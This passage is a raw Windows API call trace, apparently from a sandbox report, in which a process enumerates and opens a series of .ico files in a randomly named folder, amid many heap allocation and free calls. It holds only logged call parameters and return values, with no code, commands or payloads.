hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.074] AreFileApisANSI () returned 1 [0062.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0062.074] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.074] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.075] AreFileApisANSI () returned 1 [0062.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", lpUsedDefaultChar=0x0) returned 43 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0062.075] AreFileApisANSI () returned 1 [0062.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0062.076] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.076] GetFileType (hFile=0x41c) returned 0x1 [0062.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.076] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.076] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.076] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.076] CloseHandle (hObject=0x41c) returned 1 [0062.076] AreFileApisANSI () returned 1 [0062.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0062.077] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.077] GetFileType (hFile=0x41c) returned 0x1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.077] CloseHandle (hObject=0x41c) returned 1 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.078] AreFileApisANSI () returned 1 [0062.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0062.078] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.078] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0062.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.079] AreFileApisANSI () returned 1 [0062.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico", lpUsedDefaultChar=0x0) returned 43 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.079] AreFileApisANSI () returned 1 [0062.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0062.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0062.079] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.103] GetFileType (hFile=0x41c) returned 0x1 [0062.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0062.104] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.104] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.104] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.104] CloseHandle (hObject=0x41c) returned 1 [0062.104] AreFileApisANSI () returned 1 [0062.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0062.104] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.105] GetFileType (hFile=0x41c) returned 0x1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.105] CloseHandle (hObject=0x41c) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree 